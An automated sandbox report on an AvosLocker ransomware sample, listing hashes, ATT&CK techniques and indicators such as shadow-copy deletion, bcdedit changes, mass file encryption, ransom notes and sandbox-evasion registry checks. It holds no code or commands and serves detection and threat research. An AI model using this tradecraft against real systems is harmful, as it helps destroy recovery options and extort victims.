avoslocker | 4b0f1abf2abfd7a9a291425227844bf98b3aa0ac499268b52f69f297bda90839

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2024 00:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

T8IRU_sex.exe
Size

3.2MB
MD5

9e85a92de58c89babecf27e74f85d3f4
SHA1

d955b86d566325a2ac8960b45c2cf336ddac4717
SHA256

4b0f1abf2abfd7a9a291425227844bf98b3aa0ac499268b52f69f297bda90839
SHA512

84e094d097ed6ac187d7d301d6a772ca59cfebc829e63cca70685d7176111a3afbad4ff4908932b0ec436a34a302fd53a4fce97aeda126796daab5b130fc72d9
SSDEEP

24576:8SUpZr3y2amHY6MdefqTXeZty61kSSTKa7WsUS2VSs+stModjGdbzfDUBB355zs/:oZat81wua7bUScTLTXO+2NwL5ljasaU

Score

10^/10

avoslocker defense_evasion discovery evasion execution impact ransomware trojan upx

Malware Config

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker
Avoslocker family
avoslocker
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
13268	bcdedit.exe
12680	bcdedit.exe

Renames multiple (8500) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Executes dropped EXE 2 IoCs

pid	Process
3952	rufus-4.6p.exe
464	hack.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	rufus-4.6p.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	hack.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	hack.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rufus-4.6p.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rufus-4.6p.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rufus-4.6p.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rufus-4.6p.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\513130469.png"	reg.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000c000000023b1e-4.dat	upx
behavioral2/memory/3952-7-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-16757-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22745-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22746-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22791-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22800-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22819-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22824-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22827-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22833-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22838-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22841-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22845-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22848-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22852-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx
behavioral2/memory/3952-22855-0x00007FF7244E0000-0x00007FF72494E000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\TipRes.dll.mui	hack.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-400.png	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkNoDrop32x32.gif	hack.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sl-sl\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.MSOUC.16.1033.hxn	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml	hack.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul-oob.xrm-ms	hack.exe
File created	C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Common Files\System\es-ES\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\WATERMAR.INF	hack.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\FA000000006	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\da.pak.DATA	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\ui-strings.js	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\it-IT\MSFT_PackageManagementSource.strings.psd1	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyView.scale-150.png	hack.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-pl.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_ja.properties	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons.png	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-RTL.gif	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-300.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ppd.xrm-ms	hack.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark.png	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js	hack.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-150.png	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\PNG32.FLT	hack.exe
File created	C:\Program Files\Microsoft Office\root\Client\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\FrameworkList.xml	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-2x.png	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.INF	hack.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
12204	powershell.exe
28504	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hack.exe

Checks SCSI registry key(s) 3 TTPs 17 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	rufus-4.6p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters	rufus-4.6p.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	rufus-4.6p.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
12272	vssadmin.exe

Modifies registry class 28 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe1000000050ef5e839818db01700802728859db01ccebdb818859db0114000000	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	rufus-4.6p.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	rufus-4.6p.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	rufus-4.6p.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	rufus-4.6p.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	rufus-4.6p.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rufus-4.6p.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
464	hack.exe
464	hack.exe
12204	powershell.exe
12204	powershell.exe
12204	powershell.exe
28504	powershell.exe
28504	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	464	hack.exe
Token: SeDebugPrivilege	3952	rufus-4.6p.exe
Token: SeIncreaseQuotaPrivilege	12168	WMIC.exe
Token: SeSecurityPrivilege	12168	WMIC.exe
Token: SeTakeOwnershipPrivilege	12168	WMIC.exe
Token: SeLoadDriverPrivilege	12168	WMIC.exe
Token: SeSystemProfilePrivilege	12168	WMIC.exe
Token: SeSystemtimePrivilege	12168	WMIC.exe
Token: SeProfSingleProcessPrivilege	12168	WMIC.exe
Token: SeIncBasePriorityPrivilege	12168	WMIC.exe
Token: SeCreatePagefilePrivilege	12168	WMIC.exe
Token: SeBackupPrivilege	12168	WMIC.exe
Token: SeRestorePrivilege	12168	WMIC.exe
Token: SeShutdownPrivilege	12168	WMIC.exe
Token: SeDebugPrivilege	12168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	12168	WMIC.exe
Token: SeRemoteShutdownPrivilege	12168	WMIC.exe
Token: SeUndockPrivilege	12168	WMIC.exe
Token: SeManageVolumePrivilege	12168	WMIC.exe
Token: 33	12168	WMIC.exe
Token: 34	12168	WMIC.exe
Token: 35	12168	WMIC.exe
Token: 36	12168	WMIC.exe
Token: SeBackupPrivilege	8764	vssvc.exe
Token: SeRestorePrivilege	8764	vssvc.exe
Token: SeAuditPrivilege	8764	vssvc.exe
Token: SeDebugPrivilege	12204	powershell.exe
Token: SeIncreaseQuotaPrivilege	12168	WMIC.exe
Token: SeSecurityPrivilege	12168	WMIC.exe
Token: SeTakeOwnershipPrivilege	12168	WMIC.exe
Token: SeLoadDriverPrivilege	12168	WMIC.exe
Token: SeSystemProfilePrivilege	12168	WMIC.exe
Token: SeSystemtimePrivilege	12168	WMIC.exe
Token: SeProfSingleProcessPrivilege	12168	WMIC.exe
Token: SeIncBasePriorityPrivilege	12168	WMIC.exe
Token: SeCreatePagefilePrivilege	12168	WMIC.exe
Token: SeBackupPrivilege	12168	WMIC.exe
Token: SeRestorePrivilege	12168	WMIC.exe
Token: SeShutdownPrivilege	12168	WMIC.exe
Token: SeDebugPrivilege	12168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	12168	WMIC.exe
Token: SeRemoteShutdownPrivilege	12168	WMIC.exe
Token: SeUndockPrivilege	12168	WMIC.exe
Token: SeManageVolumePrivilege	12168	WMIC.exe
Token: 33	12168	WMIC.exe
Token: 34	12168	WMIC.exe
Token: 35	12168	WMIC.exe
Token: 36	12168	WMIC.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeSecurityPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeSecurityPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeBackupPrivilege	12204	powershell.exe
Token: SeSecurityPrivilege	12204	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3952	rufus-4.6p.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe
3952	rufus-4.6p.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 3952	1408	T8IRU_sex.exe	84
PID 1408 wrote to memory of 3952	1408	T8IRU_sex.exe	84
PID 1408 wrote to memory of 464	1408	T8IRU_sex.exe	83
PID 1408 wrote to memory of 464	1408	T8IRU_sex.exe	83
PID 1408 wrote to memory of 464	1408	T8IRU_sex.exe	83
PID 464 wrote to memory of 3680	464	hack.exe	88
PID 464 wrote to memory of 3680	464	hack.exe	88
PID 464 wrote to memory of 2680	464	hack.exe	89
PID 464 wrote to memory of 2680	464	hack.exe	89
